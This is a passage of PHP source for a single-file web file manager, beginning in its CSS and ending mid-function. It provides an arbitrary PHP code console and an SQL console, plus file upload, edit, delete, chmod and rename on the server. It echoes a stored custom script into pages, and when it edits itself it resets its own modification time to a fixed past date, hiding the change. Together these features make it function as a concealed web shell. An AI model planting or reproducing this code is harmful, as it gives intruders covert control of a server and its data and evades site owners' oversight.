url("data:image/png;base64,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");
}
.file {
background-image:
url("data:image/png;base64,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");
}
<?=fm_home_style()?>
.img {
background-image:
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
table{display:block;}
#fm_table td{display:inline;float:left;}
#fm_table tbody td:first-child{width:100%;padding:0;}
#fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
#fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
#fm_table tr{display:block;float:left;clear:left;width:100%;}
#header_table .row2, #header_table .row3
{display:inline;float:left;width:100%;padding:0;}
#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if
(isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
$res = empty($_POST['sql']) ? '' :
$_POST['sql'];
$res_lng = 'sql';
} elseif
(isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
$res = empty($_POST['php']) ? '' :
$_POST['php'];
$res_lng = 'php';
}
if (isset($_GET['fm_settings'])) {
echo '
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File
manager').' -
'.__('Settings').'</th></tr>
'.(empty($msg)?'':'<tr><td
class="row2"
colspan="2">'.$msg.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the
folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').'
'.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').'
'.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').'
'.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').'
'.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP
version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP
ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').'
'.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').'
xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP
'.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL
'.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input
name="fm_config[sql_server]"
value="'.$fm_config['sql_server'].'"
type="text"></td><td class="row2
whole">SQL server</td></tr>
<tr><td class="row1"><input
name="fm_config[sql_username]"
value="'.$fm_config['sql_username'].'"
type="text"></td><td class="row2
whole">SQL user</td></tr>
<tr><td class="row1"><input
name="fm_config[sql_password]"
value="'.$fm_config['sql_password'].'"
type="text"></td><td class="row2
whole">SQL password</td></tr>
<tr><td class="row1"><input
name="fm_config[sql_db]"
value="'.$fm_config['sql_db'].'"
type="text"></td><td class="row2
whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').'
Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').'
phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').'
'.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after
editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').':
'.__('Restore file time after
editing'),'fm_restore_time').'
<tr><td class="row3"><a
href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset
settings').'</a></td><td
class="row3"><input type="submit"
value="'.__('Save').'"
name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th
colspan="2">'.__('Settings').' -
'.__('Authorization').'</th></tr>
<tr><td class="row1"><input
name="fm_login[authorize]" value="1"
'.($auth['authorize']?'checked':'').'
type="checkbox" id="auth"></td><td
class="row2 whole"><label
for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input
name="fm_login[login]"
value="'.$auth['login'].'"
type="text"></td><td class="row2
whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input
name="fm_login[password]"
value="'.$auth['password'].'"
type="text"></td><td class="row2
whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input
name="fm_login[cookie_name]"
value="'.$auth['cookie_name'].'"
type="text"></td><td class="row2
whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input
name="fm_login[days_authorization]"
value="'.$auth['days_authorization'].'"
type="text"></td><td class="row2
whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea
name="fm_login[script]" cols="35" rows="7"
class="textarea_input"
id="auth_script">'.$auth['script'].'</textarea></td><td
class="row2
whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input
type="submit"
value="'.__('Save').'"
></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
die($proxy_form);
} elseif (isset($res_lng)) {
?>
<table class="whole">
<tr>
<th><?=__('File manager').' -
'.$path?></th>
</tr>
<tr>
<td
class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?>
<?=__('Console')?><?php
if($res_lng=='sql') echo ' - Database:
'.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
else echo
'</h2></td><td>'.fm_run_input('sql');
?></td></tr></table></td>
</tr>
<tr>
<td class="row1">
<a href="<?=$url_inc.'&path=' .
$path;?>"><?=__('Back')?></a>
<form action="" method="POST"
name="console">
<textarea name="<?=$res_lng?>" cols="80"
rows="10" style="width:
90%"><?=$res?></textarea><br/>
<input type="reset"
value="<?=__('Reset')?>">
<input type="submit"
value="<?=__('Submit')?>"
name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
$active = isset($_POST[$res_lng.'_tpl']) ?
$_POST[$res_lng.'_tpl'] : '';
$select = '<select name="'.$res_lng.'_tpl"
title="'.__('Template').'" onchange="if
(this.value!=-1)
document.forms[\'console\'].elements[\''.$res_lng.'\'].value
= this.options[selectedIndex].value; else
document.forms[\'console\'].elements[\''.$res_lng.'\'].value
=\'\';" >'."\n";
$select .= '<option value="-1">' .
__('Select') . "</option>\n";
foreach ($tmpl as $key=>$value){
$select.='<option value="'.$value.'"
'.((!empty($value)&&($value==$active))?'selected':'').'
>'.__($key)."</option>\n";
}
$select .= "</select>\n";
echo $select;
}
?>
</form>
</td>
</tr>
</table>
<?php
if (!empty($res)) {
$fun='fm_'.$res_lng;
echo '<h3>'.strtoupper($res_lng).'
'.__('Result').'</h3><pre>'.$fun($res).'</pre>';
}
} elseif (!empty($_REQUEST['edit'])){
if(!empty($_REQUEST['save'])) {
$fn = $path . $_REQUEST['edit'];
$filemtime = filemtime($fn);
if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .=
__('File updated');
else $msg .= __('Error occurred');
if ($_GET['edit']==basename(__FILE__)) {
touch(__FILE__,1415116371);
} else {
if (!empty($fm_config['restore_time']))
touch($fn,$filemtime);
}
}
$oldcontent = @file_get_contents($path . $_REQUEST['edit']);
$editlink = $url_inc . '&edit=' .
$_REQUEST['edit'] . '&path=' . $path;
$backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0'
cellpadding='1' width="100%">
<tr>
<th><?=__('File manager').' -
'.__('Edit').' -
'.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
<td class="row1">
<?=$msg?>
</td>
</tr>
<tr>
<td class="row1">
<?=fm_home()?> <a
href="<?=$backlink?>"><?=__('Back')?></a>
</td>
</tr>
<tr>
<td class="row1" align="center">
<form name="form1" method="post"
action="<?=$editlink?>">
<textarea name="newcontent"
id="newcontent" cols="45" rows="15"
style="width:99%"
spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
<input type="submit" name="save"
value="<?=__('Submit')?>">
<input type="submit" name="cancel"
value="<?=__('Cancel')?>">
</form>
</td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
if(!empty($_REQUEST['save'])) {
if(fm_chmod($path . $_REQUEST['rights'],
fm_convert_rights($_REQUEST['rights_val']),
@$_REQUEST['recursively']))
$msg .= (__('File updated'));
else $msg .= (__('Error occurred'));
}
clearstatcache();
$oldrights = fm_rights_string($path . $_REQUEST['rights'],
true);
$link = $url_inc . '&rights=' .
$_REQUEST['rights'] . '&path=' . $path;
$backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
<th><?=__('File manager').' -
'.$path?></th>
</tr>
<tr>
<td class="row1">
<?=$msg?>
</td>
</tr>
<tr>
<td class="row1">
<a
href="<?=$backlink?>"><?=__('Back')?></a>
</td>
</tr>
<tr>
<td class="row1" align="center">
<form name="form1" method="post"
action="<?=$link?>">
<?=__('Rights').' -
'.$_REQUEST['rights']?> <input type="text"
name="rights_val" value="<?=$oldrights?>">
<?php if (is_dir($path.$_REQUEST['rights'])) { ?>
<input type="checkbox"
name="recursively" value="1">
<?=__('Recursively')?><br/>
<?php } ?>
<input type="submit" name="save"
value="<?=__('Submit')?>">
</form>
</td>
</tr>
</table>
<?php
} elseif
(!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.')
{
if(!empty($_REQUEST['save'])) {
rename($path . $_REQUEST['rename'], $path .
$_REQUEST['newname']);
$msg .= (__('File updated'));
$_REQUEST['rename'] = $_REQUEST['newname'];
}
clearstatcache();
$link = $url_inc . '&rename=' .
$_REQUEST['rename'] . '&path=' . $path;
$backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
<th><?=__('File manager').' -
'.$path?></th>
</tr>
<tr>
<td class="row1">
<?=$msg?>
</td>
</tr>
<tr>
<td class="row1">
<a
href="<?=$backlink?>"><?=__('Back')?></a>
</td>
</tr>
<tr>
<td class="row1" align="center">
<form name="form1" method="post"
action="<?=$link?>">
<?=__('Rename')?>: <input
type="text" name="newname"
value="<?=$_REQUEST['rename']?>"><br/>
<input type="submit" name="save"
value="<?=__('Submit')?>">
</form>
</td>
</tr>
</table>
<?php
} else {
//Let's rock!
$msg = '';
if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file']))
{
if(!empty($_FILES['upload']['name'])){
$_FILES['upload']['name'] =
str_replace('%', '',
$_FILES['upload']['name']);
if(!move_uploaded_file($_FILES['upload']['tmp_name'],
$path . $_FILES['upload']['name'])){
$msg .= __('Error occurred');
} else {
$msg .= __('Files uploaded').':
'.$_FILES['upload']['name'];
}
}
}
elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.')
{
if(!fm_del_files(($path . $_REQUEST['delete']), true)) {
$msg .= __('Error occurred');
} else {
$msg .= __('Deleted').'
'.$_REQUEST['delete'];
}
}
elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory']))
{
if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
$msg .= __('Error occurred');
} else {
$msg .= __('Created').'
'.$_REQUEST['dirname'];
}
} elseif(!empty($_POST['search_recursive'])) {
ini_set('max_execution_time', '0');
$search_data = find_text_in_files($_POST['path'],
$_POST['mask'], $_POST['search_recursive']);
if(!empty($search_data)) {
$msg .= __('Found in files').'
('.count($search_data).'):<br>';
foreach ($search_data as $filename) {
$msg .= '<a
href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'"
title="' . __('Edit') .
'">'.basename($filename).'</a>
';
}
} else {
$msg .= __('Nothing founded');
}
}
elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file']))
{
if(!$fp=@fopen($path .
$_REQUEST['filename'],"w")) {
$msg .= __('Error occurred');
} else {
fclose($fp);
